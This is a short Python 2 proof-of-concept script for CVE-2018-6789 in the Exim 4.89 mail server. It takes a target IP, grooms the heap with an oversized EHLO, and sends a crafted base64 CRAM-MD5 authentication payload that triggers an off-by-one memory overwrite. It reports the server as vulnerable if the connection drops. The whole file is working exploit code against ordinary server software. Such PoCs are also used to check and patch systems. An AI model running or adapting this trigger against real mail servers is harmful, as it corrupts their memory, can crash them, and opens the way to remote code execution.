#!/usr/bin/python
# -*- coding: utf-8 -*-
import smtplib
from base64 import b64encode

print "this poc is only tested in exim 4.89 x64 bit with cram-md5 authenticators"
ip_address = raw_input("input ip address: ")
s = smtplib.SMTP(ip_address)
#s.set_debuglevel(1)
# 1. put a huge chunk into unsorted bin 
s.ehlo("mmmm"+"b"*0x1500) # 0x2020

# 2. send base64 data and trigger off-by-one
raw_input("overwrite one byte of next chunk")
s.docmd("AUTH CRAM-MD5")

payload = "d"*(0x2008-1)
try:
	s.docmd(b64encode(payload)+b64encode('\xf1\xf1')[:-1])
	s.quit()
except smtplib.SMTPServerDisconnected:
	print "[!] exim server seems to be vulnerable to CVE-2018-6789."

